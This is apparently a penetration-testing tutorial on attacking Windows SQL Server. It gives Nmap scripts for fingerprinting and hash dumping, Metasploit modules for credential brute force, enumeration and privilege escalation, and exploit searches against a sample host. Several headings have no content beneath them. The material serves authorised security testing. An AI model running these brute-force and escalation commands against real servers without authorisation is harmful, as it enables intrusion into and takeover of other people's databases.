Today I am writing about how to attack Windows SQL Server remotely. Sometimes when performing a penetration test we find some SQL servers exposed on the network here we will learn how to recognize the server, brute force it and escalate privileges.
How to Attack Windows SQL Server
Information Gathering
What port is SQL Server Running?
1433/tcp open ms-sql-s Microsoft SQL Server 2017 14.00.1000.00; RTM
What version of SQL Server exists?
Scanning SQL Server
msf> use auxiliary/scanner/mssql/mssql_ping
Scanning SQL Server with Nmap
nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>
Default SQL Server Databases
master database | Records all the system-level information for an instance of SQL Server. |
model database | Is used as the template for all databases created on the instance of SQL Server. Modifications made to the model database, such as database size, collation, recovery model, and other database options, are applied to any databases created afterwards. |
tempdb database | Is a work-space for holding temporary objects or intermediate result sets. |
resource database | Is a read-only database that contains system objects that are included with SQL Server. System objects are physically persisted in the Resource database, but they logically appear in the sys schema of every database. |
msdb database | Is used by SQL Server Agent for scheduling alerts and jobs. |
SQL Server Type of Authentication
SQL Server Type of Users
Brute Force SQL Server
hydra
msfconsole script
Search useful Scripts
searchsploit "microsoft sql server"
nmap --script-help "*ms* and *sql*"
msf> search mssql
use auxiliary/scanner/mssql/mssql_login
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
set verbose true
run
use auxiliary/admin/mssql/mssql_enum
set rhosts 172.16.64.199
set rport 1433
set username fooadmin
set password fooadmin
run
Useful wordlists
Escalate SQL Server Privileges
msf> use auxiliary/admin/mssql/mssql_escalate_dbowner
msf> auxiliary/admin/mssql/mssql_escalate_execute_as